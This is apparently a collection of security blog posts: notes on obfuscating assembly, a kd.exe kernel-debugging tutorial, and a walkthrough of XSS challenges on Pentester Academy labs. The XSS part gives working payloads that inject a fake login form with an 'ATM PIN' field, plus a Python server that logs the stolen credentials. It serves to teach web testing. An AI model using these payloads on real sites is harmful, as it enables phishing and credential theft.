As you can see the byte following the data section has been moved to the data section and as a result the next few instructions have been incorrectly disassembled.

This method can be implemented throughout the whole application, making most of the instructions disassemble incorrectly.

Constant unfolding could be improved here, for instance:

1
2
3
4
5
6
  mov    al,0x8
  mov    ebx,0x4
  sub    eax,ebx
  sub    ebx,eax
  inc    ebx
  int    0x80

Could be rewritten to:

1
2
3
4
5
6
7
8
9
  push 0xff7316ca
  xor [esp], 0x8ce931
  mov eax, 0xffffffff
  sub eax, [esp]
  push eax
  shl [esp], 0x4
  sub [esp], 0x3f
  pop ebx
  int 0x80

They both do the same thing but the second is a little harder to read, you could obviously keep extending this by implementing more and more complex algorithms to work out your required value.

This can also be applied to references to memory addresses, for instance, if you want to jump to a certain memory address, do some maths to work out the memory address before jumping there.

More advanced instructions could be used like imul, idiv, cmpsb, rol, stosb, rep, movsx, fadd, fcom... The list goes on...

The MMX and other unusual registers could have been taken advantage of.

Also, the key to decrypt the data could have been a command line argument or somehow retreived from outside of the application, this way it would have been extremely difficult decode the data.

Conclusion

There are sometimes easier ways to get a result other than reversing the whole application, maybe just understanding a few bits might be enough.

Although there are ways to make the reversers job more difficult, its never possible to make it impossible to reverse, providing the reverser is able to run the application (if the CPU can see the instructions, then so can the reverser).

A good knowledge of assembly is needed to do any type of indepth reverse engineering.

Further Reading

Reversing: Secrets of Reverse Engineering by Eldad Eilam

Intel® 64 and IA-32 Architectures Developer's Manual

Usermode Application Debugging Using KD

I have started the Windows kernel hacking section with a simple explaination of the setup and a quick analysis of the crackme, that we analysed here, using the kd.exe kernel debugger.

I chose to do this instead of any actual Windows kernel stuff because its a steep learning experience learning how to use KD so its probably best to look at something you have already seen.

Setting Up The Environment

For this post I will be using a total of 4 machines, 3 virtual machines using VMware Player (you probably could use Virtualbox for this also though) hosted on a reasonably powerful machine and a laptop.

You can however do all of this with just 1 physical machine, hosting 1 virtual machine and I will explain the differences in the setup afterwards but I'll first explain the setup I am using.

Here is a visual representation of the network:

So I have 3 virtual machines on my machine running VMware Player:

1 Kali Linux, 1 Windows XP Professional and 1 Windows 7 Home Edition. All 3 of these are 32bit, although it doesn't matter but to follow along you would probably want the debuggee (the Windows 7 machine in my setup) to be 32bit. In my 2 machine setup described below the host (and debugger) is a Windows 7 64bit machine.

The Kali machine has 2 network interfaces, 1 setup in Bridged mode (so that I can SSH directly to it):

And the other setup in Host-only mode (So that it has access to the other 2 machines):

The Windows XP machine has 1 network interface setup in Host-only mode:

And the same for the Windows 7 machine:

The Windows XP and Windows 7 machines are also connected via a virtual serial cable, this is for the debugger connection.

The Windows XP machine will be the client (or the debugger):

And the Windows 7 machine will be the server (or the debuggee):

The Windows 7 machine needs both Visual Studio Express 2013 for Windows Desktop and the Windows Driver Kit (WDK) installed on it. You can get them both here.

The Windows XP machine needs Microsoft Windows SDK for Windows 7 installed, which you can get here. To install this you need to install the full version of Microsoft .NET Framework 4, which you can get here (Bare in mind that you might need an internet connection while you install these so just change the network adaptor configuration to NAT and then once it is installed change it back to Host-only again).

If the debugger is a Windows 7 machine then you will need to install the same software as on the debuggee.

Once these are installed, its best to add the path to the kd.exe application to the PATH variable.

You do this by going in to the properties of My Computer and, on Windows 7 going to Advanced system settings->Environment Variables... or on Windows XP going to Advanced->Environment Variables... and scroll down the Path and click Edit.

The path on Windows 7 should be something like C:\Program Files\Windows Kits\8.1\Debuggers\x86 and on Windows XP C:\Program Files\Debugging Tools for Windows (x86).

For remote administration I've installed TightVNC on both of the Windows machines.

I set it up with access through a Kali machine so that I can setup SSH tunnels and get VNC access to the Windows machines without giving them access to the outside network.

After TightVNC is up and running on your Windows machines, you can setup the SSH tunnels like this (For this explaination we'll imagine that the Windows XP machine is on the VMware virutal network with an IP of 172.16.188.130, the Windows 7 machine is on 172.16.188.131 and that our Kali machine is also on this network):

1
2
user@dev:~# ssh -f root@kali -L 5900:172.16.188.130:5900 -N
user@dev:~# ssh -f root@kali -L 5901:172.16.188.131:5900 -N

Now if you VNC to 127.0.0.1 you will have access to the Windows XP machine and to 127.0.0.1:1 you will have access to the Windows 7 machine.

1 VM Setup

You can also setup this up with 2 machines, the VMware host (running Windows, which will be the debugger) and the VMware guest (also running Windows, which will be the debuggee).

The serial port configuration for the debuggee in VMware in this setup should look like this:

Notice the different file path and name for Windows, the other end should be set to The other end is an application and Yeild CPU on poll should be checked.

The only other thing that is different is the command you will use to launch KD on the debugger (we haven't got to that but it is shown below for my 4 machine setup), you should instead use kd -k com:port=\\.\pipe\com_1,pipe.

Using KD

On Windows 7 (the debuggee) you will need to tell it to lanuch the debugger on boot, for this you need to run an Administrator command prompt and:

1
2
3
4
5
C:\Windows\system32>bcdedit /dbgsettings SERIAL DEBUGPORT:2 BAUDRATE:115200
The operation completed successfully.

C:\Windows\system32>bcdedit /debug on
The operation completed successfully.

The DEBUGPORT:2 option here is the port number of the COM port that you are going to use, for me it was COM2 hence the number 2.

Now we launch the kernel debugger on the Windows XP machine (this is the command that is different on the 2 machine setup):

1
2
3
4
5
6
7
C:\Documents and Settings\User>kd -k com:port=1,baud=115200

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\com1
Waiting to reconnect...

Again the port=1 option here is the COM port that you are going to be using, I will be using COM1 on this machine hence the 1.

Then reboot the Windows 7 machine and watch the KD terminal on the Windows XP machine:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
Connected to Windows 7 7601 x86 compatible target at (Fri Sep 26 14:43:59.625 20
14 (UTC + 1:00)), ptr64 FALSE
Kernel Debugger connection established.
Symbol search path is: SRV*C:\websymbols*http://msdl.microsoft.com/download/symb
ols
Executable search path is:
Windows 7 Kernel Version 7601 (Service Pack 1) MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.18409.x86fre.win7sp1_gdr.140303-2144
Machine Name:
Kernel base = 0x82814000 PsLoadedModuleList = 0x8295d5b0
Debug session time: Sun Dec 29 22:42:59.976 1985 (UTC + 1:00)
System Uptime: 0 days 0:02:14.490

Now run the crackme application on the debuggee (Windows 7):

Go back to the Windows XP machine and in the debugger terminal window press Control + C:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
Break instruction exception - code 80000003 (first chance)
*******************************************************************************
*                                                                             *
*   You are seeing this message because you pressed either                    *
*       CTRL+C (if you run kd.exe) or,                                        *
*       CTRL+BREAK (if you run WinDBG),                                       *
*   on your debugger machine's keyboard.                                      *
*                                                                             *
*                   THIS IS NOT A BUG OR A SYSTEM CRASH                       *
*                                                                             *
* If you did not intend to break into the debugger, press the "g" key, then   *
* press the "Enter" key now.  This message might immediately reappear.  If it *
* does, press "g" and "Enter" again.                                          *
*                                                                             *
*******************************************************************************
nt!RtlpBreakWithStatusInstruction:
8288e7b8 cc              int     3
kd>

Now we have broken into the kernel, this means that anything we do will be in the context of the kernel, we can see this in the debugger:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
kd> .process
Implicit process is now 844bdae8
kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS 844bdae8  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00185000  ObjectTable: 88401c78  HandleCount: 463.
    Image: System

PROCESS 85027020  SessionId: none  Cid: 00ec    Peb: 7ffd4000  ParentCid: 0004
    DirBase: 5f228020  ObjectTable: 89496538  HandleCount:  29.
    Image: smss.exe

PROCESS 85702030  SessionId: 0  Cid: 0140    Peb: 7ffd6000  ParentCid: 0134
    DirBase: 5f228060  ObjectTable: 91695508  HandleCount: 389.
    Image: csrss.exe

PROCESS 84520378  SessionId: 0  Cid: 0170    Peb: 7ffdf000  ParentCid: 0134
    DirBase: 5f2280a0  ObjectTable: 93023448  HandleCount:  87.
    Image: wininit.exe

PROCESS 850e7030  SessionId: 1  Cid: 0178    Peb: 7ffda000  ParentCid: 0168
    DirBase: 5f228040  ObjectTable: 885f5520  HandleCount: 176.
    Image: csrss.exe

PROCESS 8572f530  SessionId: 1  Cid: 0194    Peb: 7ffdb000  ParentCid: 0168
    DirBase: 5f2280c0  ObjectTable: 93020e70  HandleCount: 117.
    Image: winlogon.exe

PROCESS 857e2c48  SessionId: 0  Cid: 01dc    Peb: 7ffd6000  ParentCid: 0170
    DirBase: 5f228080  ObjectTable: 98040678  HandleCount: 245.
    Image: services.exe

PROCESS 857fb980  SessionId: 0  Cid: 01e4    Peb: 7ffdf000  ParentCid: 0170
    DirBase: 5f2280e0  ObjectTable: 9805ba38  HandleCount: 504.
    Image: lsass.exe

PROCESS 857fc678  SessionId: 0  Cid: 01ec    Peb: 7ffdf000  ParentCid: 0170
    DirBase: 5f228100  ObjectTable: 9805dcf0  HandleCount: 144.
    Image: lsm.exe

PROCESS 8582c858  SessionId: 0  Cid: 0258    Peb: 7ffd6000  ParentCid: 01dc
    DirBase: 5f228120  ObjectTable: 98168ef8  HandleCount: 352.
    Image: svchost.exe

PROCESS 85845848  SessionId: 0  Cid: 02a4    Peb: 7ffd3000  ParentCid: 01dc
    DirBase: 5f228140  ObjectTable: 93182530  HandleCount: 241.
    Image: svchost.exe

PROCESS 8585b568  SessionId: 0  Cid: 02e0    Peb: 7ffd7000  ParentCid: 01dc
    DirBase: 5f228160  ObjectTable: 980d5468  HandleCount: 383.
    Image: svchost.exe

PROCESS 85897628  SessionId: 0  Cid: 0350    Peb: 7ffdf000  ParentCid: 01dc
    DirBase: 5f2281a0  ObjectTable: 8ca18bc0  HandleCount: 268.
    Image: svchost.exe

PROCESS 858a7410  SessionId: 0  Cid: 037c    Peb: 7ffda000  ParentCid: 01dc
    DirBase: 5f2281c0  ObjectTable: 8ca8e818  HandleCount: 251.
    Image: svchost.exe

PROCESS 858bf818  SessionId: 0  Cid: 03b4    Peb: 7ffdf000  ParentCid: 01dc
    DirBase: 5f2281e0  ObjectTable: 8ca00b30  HandleCount: 806.
    Image: svchost.exe

PROCESS 858ce658  SessionId: 0  Cid: 03ec    Peb: 7ffd8000  ParentCid: 02e0
    DirBase: 5f228200  ObjectTable: 8cb845d0  HandleCount: 121.
    Image: audiodg.exe

PROCESS 858d37c0  SessionId: 0  Cid: 0400    Peb: 7ffde000  ParentCid: 01dc
    DirBase: 5f228220  ObjectTable: 8cb97f58  HandleCount: 104.
    Image: svchost.exe

PROCESS 858e8238  SessionId: 0  Cid: 0460    Peb: 7ffd6000  ParentCid: 01dc
    DirBase: 5f228240  ObjectTable: 8cbc3380  HandleCount: 351.
    Image: svchost.exe

PROCESS 85707d40  SessionId: 1  Cid: 050c    Peb: 7ffd9000  ParentCid: 0194
    DirBase: 5f228280  ObjectTable: 92cff7b0  HandleCount:  46.
    Image: userinit.exe

PROCESS 8593dd40  SessionId: 1  Cid: 051c    Peb: 7ffda000  ParentCid: 0350
    DirBase: 5f2282a0  ObjectTable: 92d040e0  HandleCount:  71.
    Image: dwm.exe

PROCESS 8594b738  SessionId: 1  Cid: 0538    Peb: 7ffde000  ParentCid: 050c
    DirBase: 5f2282c0  ObjectTable: 92d16c08  HandleCount: 684.
    Image: explorer.exe

PROCESS 8595d990  SessionId: 0  Cid: 055c    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f2282e0  ObjectTable: 980413e8  HandleCount:  75.
    Image: spoolsv.exe

PROCESS 85975d40  SessionId: 1  Cid: 0574    Peb: 7ffdb000  ParentCid: 01dc
    DirBase: 5f228300  ObjectTable: 98087388  HandleCount: 180.
    Image: taskhost.exe

PROCESS 8597c480  SessionId: 0  Cid: 059c    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f228320  ObjectTable: 981644c0  HandleCount: 321.
    Image: svchost.exe

PROCESS 857b1030  SessionId: 0  Cid: 061c    Peb: 7ffdf000  ParentCid: 01dc
    DirBase: 5f228340  ObjectTable: 9361d7c0  HandleCount:  62.
    Image: armsvc.exe

PROCESS 8576a030  SessionId: 0  Cid: 066c    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f228360  ObjectTable: 98192530  HandleCount:  84.
    Image: sqlwriter.exe

PROCESS 857b99c0  SessionId: 0  Cid: 0694    Peb: 7ffd8000  ParentCid: 01dc
    DirBase: 5f228380  ObjectTable: 9765fa30  HandleCount:  92.
    Image: tlntsvr.exe

PROCESS 85996d40  SessionId: 1  Cid: 06bc    Peb: 7ffdf000  ParentCid: 0538
    DirBase: 5f2283a0  ObjectTable: 976b6a40  HandleCount:  64.
    Image: tvnserver.exe

PROCESS 859d92f0  SessionId: 0  Cid: 0708    Peb: 7ffdc000  ParentCid: 01dc
    DirBase: 5f2283e0  ObjectTable: 8d600730  HandleCount: 184.
    Image: tvnserver.exe

PROCESS 859ec4f0  SessionId: 1  Cid: 075c    Peb: 7ffd3000  ParentCid: 06cc
    DirBase: 5f228400  ObjectTable: 9812e900  HandleCount:  48.
    Image: reader_sl.exe

PROCESS 859f7d40  SessionId: 0  Cid: 0220    Peb: 7ffdd000  ParentCid: 01dc
    DirBase: 5f2283c0  ObjectTable: 977880a0  HandleCount: 102.
    Image: svchost.exe

PROCESS 85a68d40  SessionId: 0  Cid: 03c4    Peb: 7ffd9000  ParentCid: 01dc
    DirBase: 5f228260  ObjectTable: 980eb688  HandleCount: 590.
    Image: SearchIndexer.exe

PROCESS 85a4cd40  SessionId: 0  Cid: 04dc    Peb: 7ffd5000  ParentCid: 03c4
    DirBase: 5f228420  ObjectTable: 94285460  HandleCount: 233.
    Image: SearchProtocolHost.exe

PROCESS 85a95d40  SessionId: 0  Cid: 0378    Peb: 7ffd5000  ParentCid: 03c4
    DirBase: 5f228440  ObjectTable: 931b48e8  HandleCount:  79.
    Image: SearchFilterHost.exe

PROCESS 85abfd40  SessionId: 1  Cid: 08e4    Peb: 7ffdf000  ParentCid: 0538
    DirBase: 5f228460  ObjectTable: 92c6b320  HandleCount:  35.
    Image: SomeCrypto~01.exe

kd>

On line 1 I run the .process command without any parameters and it tells us the process we are currently in (844bdae8 is the EPROCESS number).

On line 3 I run the !process extension with 0 0 as its arguments, this lists all of the running processes and some details about them, as you can see from lines 5-7, EPROCESS 844bdae8 is the System process, or the kernel.

What we want to do is change the context to our crackme application, which you can see from lines 141-143 has the EPROCESS of 85abfd40:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
kd> .process /i /r /p 85abfd40
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
828c97b8 cc              int     3
kd> .process
Implicit process is now 85abfd40
kd>

On line 1 I use the .process command to change the context to our crackme application but before the context can be changed execution needs to be resumed (which is done on line 5).

Now we can set a breakpoint anywhere in the crackme's virtual memory address space, we want to break with them calls to GetDlgItemTextA that were responsible for getting the text in the textboxes of the application (If you are unsure about what I am talking about, please go back and review the previous post):

1
2
3
4
kd> bp USER32!GetDlgItemTextA
kd> bl
 0 e 76213d14     0001 (0001) user32!GetDlgItemTextA
kd>

Now that the breakpoint is set we can resume execution, wait for it to be hit and inspect the memory.

Remember that the prototype for GetDlgItemText is:

1
2
3
4
5
6
UINT WINAPI GetDlgItemText(
  _In_   HWND hDlg,
  _In_   int nIDDlgItem,
  _Out_  LPTSTR lpString,
  _In_   int nMaxCount
);
1
2
3
4
5
6
7
8
9
kd> g
Breakpoint 0 hit
user32!GetDlgItemTextA:
001b:76213d14 8bff            mov     edi,edi
kd> dd esp L4
0012fb6c  0040127f 0002014e 000003e9 0012fc40
kd> da 12fc40
0012fc40  "Enter your name..."
kd>

On line 5 I use the dd command to display 4 double words on the top of the stack. The first dword will be the return address (as you will see in a minute), then we have the first 3 arguments.

The 3rd argument is the address where the buffer for the string is, on line 7 I use the da command to display the ascii value at that address.

Keep in mind that this is the start of the function so the value hasn't been fetched yet, we can see the returned value by tracing through until we are in the calling function using the ug command and checking again:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
kd> gu
001b:0040127f 6a40            push    40h
kd> u
001b:0040127f 6a40            push    40h
001b:00401281 8d942484000000  lea     edx,[esp+84h]
001b:00401288 52              push    edx
001b:00401289 68ea030000      push    3EAh
001b:0040128e 56              push    esi
001b:0040128f ffd7            call    edi
001b:00401291 8d44240c        lea     eax,[esp+0Ch]
001b:00401295 50              push    eax
kd> da 12fc40
0012fc40  "Enter your name..."
kd>

As you can see the value is the same (because we haven't changed the text in the textbox), you can also see the address which it returned back to after executing GetDlgItemTextA was 0040127f, which was the top value on the stack.

Lastly let's resume and make sure it does the same with the other textbox:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
kd> g
Breakpoint 0 hit
user32!GetDlgItemTextA:
001b:76213d14 8bff            mov     edi,edi
kd> dd esp L4
0012fb6c  00401291 0002014e 000003ea 0012fc00
kd> da 12fc00
0012fc00  "Enter your serial..."
kd> gu
001b:00401291 8d44240c        lea     eax,[esp+0Ch]
kd> da 12fc00
0012fc00  "Enter your serial..."

Conclusion

This was only a simple tutorial to get the environment set up and get a basic grasp of kd.exe and some of its commands.

This was by no means an exhaustive list of commands and extensions, the debugger comes with many and has very good documentation.

Hopefully you now have a better understanding of how to debug using kd.exe and you now have the environment to do it in.

Further Reading

The Debugging and Automation chapter in Practical Reverse Engineering by Bruce Dang, Alexandre Gazet and Elias Bachaalany.

Also the kd.exe documentation that ships with the WDK or SDK.

Reflected XSS at PentesterAcademy

Here I will demonstrate 3 XSS attacks against 3 different challenges on Pentester Academy.

Pentester Academy has a large number of courses and challenges devoted to learning penetration testing and improving your skills.

My aim here will be first to demonstrate basic reflected XSS and then show how 2 different filters can be beaten.

XSS is the ability to execute JavaScript inside the browser of anyone who visits a specific webpage usually by injecting a combination of HTML and JavaScript.

Challenge 16: HTML Injection

The first one we'll look at is challenge 16.

This is the actual challenge page, if you browse to it, you should see this:

What I'm going to do is replace the whole form with one of my own which submit's to a server of my choosing and has an extra field but, otherwise, looks exactly the same as the real 1.

First, let's have a look at the vulnerability. First we need to see what happens when we submit a form:

I submitted the form with foo in the username field and bar in the password field. This is the full URL that I end up with:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo&password=bar

As you can see, this was just submitted to the same page as a GET request. As this is the case, we can just manipulate this URL to test the fields, if the form had submitted a POST request, we'd have to keep submitting the form or use something like Burp Suite's Repeater feature.

You can see that the value of the email field has been reflected in the username input box. This is where we can test for a reflected XSS/HTMLi vulnerability.

Before that, let's check the source of this page to see in what context on the page our input has landed, right click on the page and click something like View Source:

So we've landed inside the value attribute of an input tag.

Now let's check if we can use certain characters, send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=foo"<'()[]>&password=bar

It looks like theres little to no filtering here, we've managed to close the input tag with the greater than (>) character that we sent, but let's look at the source:

So as suspected, there has been no filtering, this makes our job much easier.

Looking at the source code of the vulnerable form, we can figure out any required prefix and suffix:

1
2
3
4
5
6
7
8
9
<form class="form-signin">
  <h2 class="form-signin-heading">Please sign in</h2>
  <input type="text" value="INJECTIONPOINT" class="input-block-level" placeholder="Email address" name="email">
  <input type="password" class="input-block-level" placeholder="Password" name="password">
  <label class="checkbox">
    <input type="checkbox" value="remember-me" name="DoesThisMatter"> Remember me
  </label>
  <button class="btn btn-large btn-primary" type="submit">Sign in</button>
</form>

All we should need to do here is break out of the value attribute and the input tag, to do this we'll need to put a double quote (") (because the value attribute was opened with a ") and >, respectively, at the start of our input.

We should now test for the classic alert box XSS payload with our prefix of "> by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>alert('xss')</script>

It worked, I put the alert statement inside script tags, this is to tell the browser that this is JavaScript to be executed.

If you close the alert box and view the source you should see this:

Using this we can run any JavaScript we want, we just have to replace alert('xss'), and as I will demonstrate this allows us full control over the page that is displayed.

The first thing we need to do is remove the current form so that we can put our own form in its place.

We can find all of the forms on the page using the getElementsByTagName method.

The best way to build your JavaScript payload is to use Firebug, it allows you to write JavaScript dynamically while showing you what methods and attributes each object has avaliable.

If you open firebug, go to the Console tab and type document. if will show you a list of its methods and attributes.

If you look through the whole source of the webpage you will see that there is only 1 form, and getElementsByTagName returns an array containing all of the form objects so to access the actual form we need to run document.getElementByTagName("form")[0] to access the first element of the array:

Each object has a remove method, we can use this to remove the original form.

Also, in JavaScript, all instructions can be put on a single line but they should be seperated by a semi colon (;).

Let's try using the XSS to first remove the form using the method described and then trigger and alert box as we did before, for this we will use the following URL:

pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove();alert('xss')</script>

So that didn't work, let's look at the source and see what happened:

So it appears that our payload was cut off from the ;, we can solve this 2 ways, the first is easiest and most well known, replace the ; with a URL encoded version (%3b):

pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove()%3balert('xss')</script>

That works, but I also want to show you another method incase ;'s are blocked completely, ;'s can be replaced with comma's (,).

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email="><script>document.getElementsByTagName("form")[0].remove(),alert('xss')</script>

From this point on I'll use ,'s to seperate the instructions when sent to the server but in my examples while building the JavaScript payload I'll use ;'s.

Now we need to create the new form, we can do this using the createElement and appendChild methods, as well as the className, innerHTML, placeholder, name, type and action attributes.

Here is a full version of the Javascript that will build the form that we want and ensure it has all of the necessary attributes to make it look athentic:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
var form = document.createElement("form");
var head = document.createElement("h2");
head.className = "form-signin-heading";
head.innerHTML = "Please sign in";
var user = document.createElement("input");
var pass = document.createElement("input");
var atm = document.createElement("input");
user.className = "input-block-level";
pass.className = "input-block-level";
atm.className = "input-block-level";
user.placeholder = "Username";
user.name = "un";
user.type = "text";
pass.name = "pw";
pass.placeholder = "Password";
pass.type = "password";
atm.name = "atm";
atm.placeholder = "ATM PIN";
atm.type = "password";
var button = document.createElement("button");
button.className = "btn btn-large btn-primary";
button.type = "submit";
button.innerHTML = "Login";
form.appendChild(head);
form.appendChild(user);
form.appendChild(pass);
form.appendChild(atm);
form.appendChild(button);
form.className="form-signin";
form.action="http://localhost:9000/";

All of the information here, especially the class names, I got from the original form. I've created a new form field on line 7 and set its settings on lines 10, 17, 18 and 19.

On line 30, I set the form action to http://localhost:9000/, this means when the form is submitted it will send the request to localhost on port 9000, this could be set to any value/server under the attackers control.

The completed form is contained inside the form variable.

The last thing to do is place the form at the right place on the page. If you look through the source, the form is placed inside a div tag with the class container, before a div tag with a class well.

We can find both of these using the getElementsByClassName method and we can insert it using the insertBefore, here is the code for this:

1
2
3
var container = document.getElementsByClassName("container")[0];
var element = document.getElementsByClassName("well")[0];
container.insertBefore(form, element);

Now we have all of the code we want to run, we just need to shrink the code as much as possible, we do this because in any exploit its best to keep the payload as small as possible so there is less chance of it being noticed.

Firstly all of the spaces need to be removed, in most situations spaces only make the code easier to read, next we can shrink all of the variable names down to 1 character, let's just take the first character of each as their name, unless use strict; is used on the page (which it isn't) there is no need to declare the variables with the var keyword and lastly we use the document object repeatedly, we can create a variable with a 1 character name that point to it and use the variable instead (d=document;).

After applying the rules above, moving everything to 1 line and changing the ;'s with ,'s you get the following code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
d=document,d.getElementsByTagName("form")[0].remove(),f=d.createElement("form
"),h=d.createElement("h2"),h.className="form-signin-heading",h.innerHTML="Ple
ase sign in",u=d.createElement("input"),p=d.createElement("input"),a=d.create
Element("input"),u.className="input-block-level",p.className="input-block-lev
el",a.className="input-block-level",u.placeholder="Username",u.name="un",u.ty
pe="text",p.name="pw",p.placeholder="Password",p.type="password",a.name="atm"
,a.placeholder="ATM PIN",a.type="password",b=d.createElement("button"),b.clas
sName="btn btn-large btn-primary",b.type="submit",b.innerHTML="Login",f.appen
dChild(h),f.appendChild(u),f.appendChild(p),f.appendChild(a),f.appendChild(b)
,f.className="form-signin",f.action="http://localhost:9000/",c=d.getElementsB
yClassName("container")[0],e=d.getElementsByClassName("well")[0],c.insertBefo
re(f,e)

We could probably shrink this down some more but this will do for now.

To send this payload we have to send the payload inbetween the script tags, after that you should see the following:

Looking at the source we can see that it has been injected fine:

Python Capture Server

I've written a little python script using SimpleHTTPServer to capture these details:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/usr/bin/env python

import SocketServer
import SimpleHTTPServer

class HTTPRequestHandler (SimpleHTTPServer.SimpleHTTPRequestHandler):

    def do_GET(self):
        qs = self.path.split("?")[1]
        args = qs.split("&")
        c, p = self.client_address
        un = pw = ""
        for arg in args:
            name = arg.split("=")[0]
            value = arg.split("=")[1]
            if name == "un":
                print c + " - UN: " + value
                un = value
            elif name == "pw":
                print c + " - PW: " + value
                pw = value
            elif name == "atm":
                print c + " - ATM: " + value
        self.send_response(301)
        self.send_header('Location','http://pentesteracademylab.appspot.com/lab/webapp/htmli/1?email=' + un + '&password=' + pw)
        self.end_headers()

httpServer = SocketServer.TCPServer(("", 9000), HTTPRequestHandler)
httpServer.serve_forever()

This server is set to print the values to stdout and then redirect to the actual application.

With the above python server running, when our custom form is submitted you get the following:

And the output on the python server's stdout:

1
2
3
4
127.0.0.1 - UN: Username
127.0.0.1 - PW: S0m%C2%A3S3cr3tP4ssw0rd
127.0.0.1 - ATM: 1234
127.0.0.1 - - [10/Aug/2014 17:40:08] "GET /?un=Username&pw=S0m%C2%A3S3cr3tP4ssw0rd&atm=1234 HTTP/1.1" 301 -

So that is challenge 16 completed for what we wanted to achieve and everything is transparent to the end user, you just need to send the malicious link to the target.

Challenge 16 Secure

The next challenge is here, some filtering has been added to mitigate the previous exploit.

First let's look at the challenge:

This looks exactly the same as the last challenge, so let's use the application and see if that is the same:

So far everything looks the same, even the URL we are sent to:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo&password=bar

Let's analyse this application the same way as before by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=foo"<'()[]>

Looks interesting, let's look at the source:

So < and > has been encoded but " hasn't, looks like we'll have to use an event handler to run our JavaScript this time.

Ideally we want the event handler to run without any interaction, a lot of the event handlers require some interaction.

We are landing inside an input tag and 1 event we can hook is the onfocus event, but we need to make sure that the input box is in focus when the page loads, for this we can use the autofocus attribute.

So we now need a new prefix for our payload, we need to close the value attribute, with a ", we then need a space and the autofocus keyword, then a space and lastly onfocus=", so we end up with:

" autofocus onfocus="

After this there is no need to put any script tags, we can't anyway because < and > gets encoded.

Let's try executing an alert box to test if XSS works here, we need to send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/htmli/1/secure?email=" autofocus onfocus="alert('xss')

So we can now run JavaScript on this page, we will recreate the exact same attack as last time, the only change we need is to replace every " with a single quote ('), then we end up with this as our JavaScript:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
d=document,d.getElementsByTagName('form')[0].remove(),f=d.createElement('form
'),h=d.createElement('h2'),h.className='form-signin-heading',h.innerHTML='Ple
ase sign in',u=d.createElement('input'),p=d.createElement('input'),a=d.create
Element('input'),u.className='input-block-level',p.className='input-block-lev
el',a.className='input-block-level',u.placeholder='Username',u.name='un',u.ty
pe='text',p.name='pw',p.placeholder='Password',p.type='password',a.name='atm'
,a.placeholder='ATM PIN',a.type='password',b=d.createElement('button'),b.clas
sName='btn btn-large btn-primary',b.type='submit',b.innerHTML='Login',f.appen
dChild(h),f.appendChild(u),f.appendChild(p),f.appendChild(a),f.appendChild(b)
,f.className='form-signin',f.action='http://localhost:9000/',c=d.getElementsB
yClassName('container')[0],e=d.getElementsByClassName('well')[0],c.insertBefo
re(f,e)

Sending this in place of alert('xss') in our previous request gives us the following:

Looking at the source, we can see how our payload got interpreted:

Now we are in the same position as we were when we'd got our custom form on the other page.

Last Challenge: DOM XSS

This is the last challenge I'd like to demonstrate.

Even though this challenge is very different I want to create the same exploit where I create a custom form and put it on the page in a similar position as the previous examples.

Its quite a bit more difficult to exploit but let's get to it and have a look at how it works:

Its clearly doing some maths here based on the value of the statement argument given in the address bar, let's look at the source:

So we are landing inside script tags and our input is being used as an argument to eval.

This time, however, we can't see how our payload is being interpreted directly.

We should be able to run any JavaScript inside here though, let's try a normal alert box by sending the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert('xss')

That didn't work, let's open Firebug, open the console tab and try again (this should show us any error's that happened while it was executing any JavaScript):

So the problem is that the ' are URL encoded... This is because, as you can see from the source code, it is accessing the argument using the document.URL property where certain characters are URL encoded so we will be unable to use any types of quotes (' or ").

There are probably a few ways to beat this problem, an obvious 1 is to avoid using strings but we are unable to do that here.

The way I like to get around this is to use String objects and using forward slashes (/) at the beginning and end to imply it is a regular expression.

Let's try to execute an alert using this method, we need to send the following URL:

http://pentesteracademylab.appspot.com/lab/webapp/jfp/dom?statement=alert(String(/xss/))

